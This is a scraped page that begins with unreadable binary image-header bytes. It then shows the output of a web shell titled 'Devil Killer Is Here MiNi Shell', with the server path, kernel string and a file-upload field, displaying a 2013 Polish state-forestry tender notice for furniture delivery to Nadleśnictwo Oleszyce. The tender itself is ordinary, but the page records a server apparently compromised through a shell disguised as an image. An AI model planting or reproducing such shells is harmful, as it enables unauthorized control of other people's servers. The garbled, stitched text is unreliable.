JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131121/476958-N-2013.html

<p class="kh_header"><b>Oleszyce: Dostawa i montaż mebli wraz z wyposażeniem budynku administracyjno-biurowego Nadleśnictwa Oleszyce</b><br>
<b>Numer ogłoszenia: 476958 - 2013; data zamieszczenia: 21.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Oleszyce , ul. Zielona 4B, 37-630 Oleszyce, woj. podkarpackie, tel. 048 16 63 15 006, faks 048 16 63 15 665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.oleszyce.krosno.lasy.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli wraz z wyposażeniem budynku administracyjno-biurowego Nadleśnictwa Oleszyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli oraz wyposażenia budynku administracyjno-biurowego wraz ze wszystkimi kosztami do siedziby Nadleśnictwa Oleszyce, przez co należy rozumieć dostawę z ustawieniem, montażem, podłączeniem 
i sprawdzeniem całego przedmiotu umowy oraz uporządkowanie pomieszczeń 
po zrealizowaniu zamówienia

Zamówienie obejmuje:
- meble biurowe pracownicze,
- meble biurowe gabinetowe i konferencyjne,
- meble hotelowe wraz z wyposażeniem,
- meble na wymiar oraz kuchenny sprzęt AGD,
- pozostałe elementy wyposażenia wnętrz.  Szczegółowe wymagania dotyczące przedmiotu zamówienia określa: Specyfikacja techniczna na dostawę i montaż mebli oraz Projekt aranżacji wnętrz budynku administracyjno-biurowego stanowiące załącznik do niniejszej specyfikacji.
Zamawiający wymaga 24-miesięcznej gwarancji na wykonany przedmiot zamówienia.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w stosunku  do  przedmiotu  zamówienia, przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późn. zm.) w okresie 3 lat od udzielenia zamówienia i wysokości nie przekraczającej 20% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.15.10.00-5, 39.14.10.00-2, 39.14.30.00-6, 39.14.32.00-8, 30.23.13.00-0, 39.13.60.00-4, 39.29.81.00-8, 39.22.43.40-3, 39.29.83.00-0, 39.11.31.00-8, 39.12.12.00-8, 44.41.13.00-7, 39.71.11.10-3, 39.71.31.00-4, 39.71.13.62-4, 39.71.13.61-7, 39.71.14.20-9, 32.32.46.00-6, 44.11.58.11-7, 39.14.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości: 
Dla zadania częściowego nr 1: 3 000.00 PLN (słownie:  trzy tysiące 00/100 PLN)
Dla zadania częściowego nr 2: 1 000.00 PLN (słownie:  jeden tysiąc 00/100 PLN)
Dla zadania częściowego nr 3: 700.00 PLN (słownie:  siedemset  00/100 PLN)
Dla zadania częściowego nr 4: 1 000.00 PLN (słownie:  jeden tysiąc 00/100 PLN)
Dla zadania częściowego nr 5: 300.00 PLN (słownie:  trzysta  00/100 PLN)
2.	Wadium należy wnieść w terminie do dnia 2013-11-29 do godz. 09:00.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a:	pieniądzu: przelewem na rachunek bankowy Zamawiającego: BGŻ/o Jarosław 11 2030 0045 1110 0000 0077 3870;
b:	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c:	gwarancjach bankowych;
d:	gwarancjach ubezpieczeniowych;
e:	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z dnia 2007r. nr 42, poz. 275 z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku przez złożenie oświadczenia  o spełnianiu warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O  udzielenie  zamówienia  mogą  ubiegać  się  wykonawcy,  którzy  spełniają  warunki, dotyczące  posiadania  wiedzy  i  doświadczenia  tj.:  posiadają  wiedzę  i doświadczenie, polegające  na  wykonaniu  przynajmniej  jednej  dostawy charakterem odpowiadającym przedmiotowi zamówienia,  w tym dla zadania na wartość netto minimum:
Zadanie częściowe nr 1: 60 000,00 PLN
Zadanie częściowe nr 2: 20 000,00 PLN
Zadanie częściowe nr 3: 15 000,00 PLN
Zadanie częściowe nr 4: 20 000,00 PLN
Zadanie częściowe nr 5: 6 000,00 PLN
w okresie ostatnich  trzech  lat  przed  upływem  terminu  składania  ofert,  
a  jeżeli  okres  prowadzenia działalności  jest  krótszy  -  w  tym  okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
W przypadku gdy wykonawca ubiega się o udzielenie zamówienia na więcej niż jednym zadaniu  jednocześnie, winien wykazać się spełnieniem warunku dotyczącego posiadania wiedzy i doświadczenia w wymaganej ilości w odniesieniu do każdej oferowanej części osobno.
W przypadku złożenia dokumentów zawierających inną niż polski złoty walutę Zamawiający przyjmie zasadę przeliczenia waluty obcej zgodnie z kursem ogłoszonym przez Narodowy Bank Polski w dniu składania ofert. 
Ocena  spełniania  warunków  udziału  w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie oświadczenia wykonawcy o spełnianiu warunków oraz wykazu dostaw potwierdzonego dowodami, że zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku przez złożenie oświadczenia  o spełnianiu warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku przez złożenie oświadczenia  o spełnianiu warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku przez złożenie oświadczenia  o spełnianiu warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie której dokonano wyboru Dostawcy, 
w następujących okolicznościach:
1.1.	Zmiany w przedmiocie zamówienia, wskazanego w umowie wynikające z:
a.	konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych materiałów gwarantujących lepszą jakość;
b.	ujawnienia błędu Zamawiającego, w trakcie realizacji zamówienia, niemożliwego do zauważenia     przez     Dostawców     w     postępowaniu     poprzedzającym     wybór najkorzystniejszej oferty;
c.	gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej;
d.	okolicznościami, których nie można było przewidzieć w chwili zawarcia umowy oraz okolicznościami leżącymi po stronie Zamawiającego;
e.	zmiany w przedmiocie umowy, jeżeli wprowadzona zmiana będzie korzystna dla Zamawiającego i spowoduje otrzymanie przedmiotu umowy wykonanego 
z materiałów o lepszej jakości oraz charakteryzującego się lepszymi parametrami użytkowymi lub energooszczędnymi.
1.2.	Konieczności zmiany terminu realizacji przedmiotu umowy spowodowanej:
a.	okolicznościami, których nie można było przewidzieć w chwili zawarcia umowy oraz okolicznościami leżącymi po stronie Zamawiającego;
b.	gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej.
c.	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Dostawcy skutkujące niemożliwością prowadzenia dostaw;
d.	w przypadku wystąpienia którejkolwiek z okoliczności wymienionych w punktach a-c termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
1.3.	Konieczności zmiany wynagrodzenia umownego, pod warunkiem, że wiąże się ze:
a.	zmianą urzędową stawki  podatku VAT  (należny podatek VAT naliczony zostanie do ceny netto w fakturze według stawki zgodnej z obowiązującym prawem w dniu wystawienia faktury).
1.4.	Pozostałe zmiany:
a.	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b.	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Dostawcy zostanie pomniejszone do rozmiaru rzeczywistego zamówienia obliczonego według stawek jednostkowych zawartych w złożonym  kosztorysie ofertowym.
1.5.	Ponadto   Zamawiający   dopuszcza   możliwość   zmian   redakcyjnych   umowy,   zmian będących   następstwem   zmian   danych   zarówno  jego  jak  i   Dostawcy,   w  tym ujawnionych   w   rejestrach   publicznych   (np.   zmiana   oznaczenia   adresu,   nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy 
w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, 
a jedynie notatki protokół i zatwierdzonego przez przedstawicieli obu stron.
1.6.	Wszelkie   zmiany  wprowadzane   do   umowy   dokonywane   będą  
z   poszanowaniem obowiązków wynikających z przepisów prawa,  w tym 
w szczególności  nie mogą powodować    wykroczenia   poza    określenie    przedmiotu    zamówienia   zawarte   w specyfikacji istotnych warunków zamówienia, zgodnie z art. 140 ust. 3 ustawy Prawo zamówień publicznych (Dz. U. 
z 2013 r. poz. 907, z późn. zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Prawo zamówień publicznych.
1.7.	Wszystkie zmiany postanowień zawartej umowy wymagają zgody obu stron 
i zachowania formy pisemnej (aneks) pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_oleszyce/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego (siedziba zastępcza ul. Zielona 1).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2013 godzina 09:00, miejsce: w siedzibie Zamawiającego (siedziba zastępcza ul. Zielona 1) pokój nr 1 Sekretariat Nadleśnictwa Oleszyce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i montaż mebli biurowych pracowniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli oraz wyposażenia budynku administracyjno-biurowego wraz ze wszystkimi kosztami do siedziby Nadleśnictwa Oleszyce, przez co należy rozumieć dostawę z ustawieniem, montażem, podłączeniem i sprawdzeniem całego przedmiotu umowy oraz uporządkowanie pomieszczeń po zrealizowaniu zamówienia. Zamówienie obejmuje meble biurowe pracownicze. 

Szczegółowe wymagania dotyczące przedmiotu zamówienia określa: Specyfikacja techniczna na dostawę i montaż mebli oraz Projekt aranżacji wnętrz budynku administracyjno-biurowego stanowiące załącznik do niniejszej specyfikacji.


Zamawiający wymaga 24-miesięcznej gwarancji na wykonany przedmiot zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.31.00-8, 39.12.12.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż mebli biurowych gabinetowych i konferencyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż mebli oraz wyposażenia budynku administracyjno-biurowego wraz ze wszystkimi kosztami do siedziby Nadleśnictwa Oleszyce, przez co należy rozumieć dostawę z ustawieniem, montażem, podłączeniem i sprawdzeniem całego przedmiotu umowy oraz uporządkowanie pomieszczeń po zrealizowaniu zamówienia. Zamówienie obejmuje meble biurowe gabinetowe i konferencyjne.

Szczegółowe wymagania dotyczące przedmiotu zamówienia określa: Specyfikacja techniczna na dostawę i montaż mebli oraz Projekt aranżacji wnętrz budynku administracyjno-biurowego stanowiące załącznik do niniejszej specyfikacji.


Zamawiający wymaga 24-miesięcznej gwarancji na wykonany przedmiot zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.31.00-8, 39.12.12.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
